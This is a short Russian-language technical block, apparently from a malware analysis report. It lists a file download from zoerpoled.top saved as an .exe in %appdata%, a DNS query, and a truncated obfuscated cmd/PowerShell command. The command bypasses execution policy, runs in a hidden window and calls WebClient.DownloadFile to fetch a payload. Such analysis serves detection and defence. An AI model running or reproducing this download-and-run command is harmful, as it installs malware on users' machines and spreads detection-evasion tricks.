Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWErsh^E^Ll.exE^ -E^X^ecUTIONPOliCY BYp^as^s -NOpr^oFILE -wI^N^D^oW^s^tyLe hI^D^dEN (NEW^-o^Bje^c^T sYstEM.N^et.^web^CL^ie^Nt^).d^Ownloa^DF^ILe(^'http://www.zoerpoled.top/r...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "pOWErsh^E^Ll.exE^ -E^X^ecUTIONPOliCY BYp^as^s -NOpr^oFILE -wI^N^D^oW^s^tyLe hI^D^dEN (NEW^-o^Bje^c^T sYstEM.N^et.^web^CL^ie^Nt^).d^Ownloa^DF^ILe(^'http://www.zoerpoled.top/r...' (со скрытым окном)